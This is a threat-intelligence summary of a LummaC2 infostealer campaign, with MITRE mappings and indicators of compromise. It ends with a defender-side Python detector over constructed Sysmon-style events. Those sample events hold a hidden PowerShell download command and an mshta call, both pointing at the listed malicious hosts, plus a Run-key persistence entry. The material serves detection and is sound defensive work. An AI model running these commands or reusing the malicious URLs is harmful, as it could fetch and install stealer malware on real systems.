Recent LummaC2 samples reveal a multi-stage infostealer chain that starts with PowerShell commands to download and decrypt payloads, then communicates with C2 servers to exfiltrate data. The campaign leverages LOLbins like mshta.exe, registry persistence, and process injection into dllhost.exe to maintain control. #LummaC2 #LummaInfostealer
Keypoints
- Recent uptick in LummaC2 infostealer activity.
- Lumma is a C-based information-stealing malware used as Malware-as-a-Service (MaaS) on forums since 2022.
- Initial infection occurs via PowerShell commands that download and execute the malware.
- Samples exhibit high entropy, suggesting obfuscation techniques.
- Malware uses legitimate Windows binaries (e.g., mshta.exe) as LOLbins.
- Persistence and C2 operations involve registry modifications, process injection, and creation of child processes (e.g., dllhost.exe).
- Indicators of compromise include specific URLs and IP addresses associated with the malware.
MITRE Techniques
- [T1036] Masquerading – Malware attempts to disguise itself to avoid detection.
- [T1059.001] PowerShell – Initial execution through PowerShell commands.
- [T1218.005] Living off the Land Binaries – Uses mshta.exe to execute malicious scripts. “Mshta.exe is an executable file designed to execute Microsoft HTML files, known as ‘HTA’. As a legitimate Microsoft Windows binary, it is considered a LOLbin (Living off the Land binary), which allows actors to use the process for malicious purposes.”
- [T1547.001] Registry Run Keys / Startup Folder – Modifies registry to achieve persistence. “This is one of the most common spots for persistence, as it allows the actor to obtain access to the target endpoint.”
- [T1055] Process Injection – Injects code into legitimate processes (e.g., dllhost.exe) for malicious actions. “Malicious code is injected into ‘Bitlockertogo.exe,’ which then creates two additional processes that finally create ‘dllhost.exe.’”
- [T1119] Collection – Collects data from the target system.
- [T1041] Exfiltration Over Command and Control Channel – Exfiltrates data through established command and control channels.
Indicators of Compromise
- [URL] Endpoints used for payload delivery and C2 – https://mato-camp-v4.b-cdn.net, http://campzips1.b-cdn.net/U1.zip
- [IP Address] Command and control endpoints – 188.68.220.48, 185.166.143.48
- [Domain] Domains involved in C2/hosting – vamplersam.info, bitbucket.org
- [File Name/Hash] Dropped payloads and components – ashampoo.exe – SHA256: 2caf283566656a13bf71f8ceac3c81f58a049c92a788368323b1ba25d872372e, Kesty[1] – SHA256: 2468e5bb596fa4543dba2adfe8fd795073486193b77108319e073b9924709a8a; and 2 more hashes
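As an added, defender-side example (not code from the original post or from Ontinue), the Python below walks a constructed Sysmon-style event list and maps the chain in the MITRE list above (PowerShell download cradle, mshta.exe, Run-key persistence, dllhost.exe descended from BitLockerToGo.exe) to ATT&CK ids, using the listed C2 hosts as indicators. The event field names, the sample events and the stage2.exe name are assumptions.

```python
import re
# Indicators copied from the summary above; everything else here is constructed.
C2_HOSTS = {"188.68.220.48", "185.166.143.48", "vamplersam.info",
            "mato-camp-v4.b-cdn.net", "campzips1.b-cdn.net"}
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
base = lambda path: path.rsplit("\\", 1)[-1].lower()   # image path -> file name

def ancestors(pid, procs):
    """Image names of pid's ancestors, following ppid links (cycle-safe)."""
    seen, out = set(), []
    while pid in procs and pid not in seen:
        seen.add(pid)
        pid = procs[pid]["ppid"]
        if pid in procs:
            out.append(base(procs[pid]["image"]))
    return out

def detect(events):
    """Map each ATT&CK id from the summary to the pids whose events match it."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    hits = {}
    def hit(tid, pid): hits.setdefault(tid, set()).add(pid)
    for e in events:
        pid = e["pid"]
        img = base(procs[pid]["image"]) if pid in procs else ""
        if e["type"] == "process":
            if img == "powershell.exe" and CRADLE.search(e["cmdline"]):
                hit("T1059.001", pid)   # download cradle in the command line
            if img == "mshta.exe" and re.search(r"https?://", e["cmdline"], re.I):
                hit("T1218.005", pid)   # LOLbin handed a remote URL
            if img == "dllhost.exe" and "bitlockertogo.exe" in ancestors(pid, procs):
                hit("T1055", pid)       # dllhost.exe descended from the injected host
        elif e["type"] == "registry" and RUN_KEY.search(e["target"]):
            hit("T1547.001", pid)       # Run-key persistence
        elif e["type"] == "network" and e["dest"] in C2_HOSTS:
            hit("T1041", pid)           # traffic to a listed C2 host
    return {t: sorted(p) for t, p in hits.items()}

SAMPLE = [  # constructed Sysmon-style events; stage2.exe is a hypothetical name
    {"type": "process", "pid": 2, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c iwr http://campzips1.b-cdn.net/U1.zip -o $env:TEMP\\U1.zip"},
    {"type": "process", "pid": 3, "ppid": 2, "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta https://mato-camp-v4.b-cdn.net"},
    {"type": "process", "pid": 4, "ppid": 3, "image": r"C:\Users\Public\ashampoo.exe", "cmdline": "ashampoo.exe"},
    {"type": "registry", "pid": 4, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ashampoo"},
    {"type": "process", "pid": 5, "ppid": 4, "image": r"C:\Windows\System32\BitLockerToGo.exe", "cmdline": "BitLockerToGo.exe"},
    {"type": "process", "pid": 6, "ppid": 5, "image": r"C:\Users\Public\stage2.exe", "cmdline": "stage2.exe"},
    {"type": "process", "pid": 7, "ppid": 6, "image": r"C:\Windows\System32\dllhost.exe", "cmdline": "dllhost.exe"},
    {"type": "network", "pid": 7, "dest": "188.68.220.48"},
    {"type": "process", "pid": 8, "ppid": 1, "image": r"C:\Windows\System32\dllhost.exe", "cmdline": "dllhost.exe /Processid:{x}"},
]
```

The benign dllhost.exe (pid 8) is deliberately left unflagged: the rule keys on ancestry through BitLockerToGo.exe rather than on the image name alone, since the summary describes intermediate processes between the injected host and dllhost.exe.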
Read more: https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/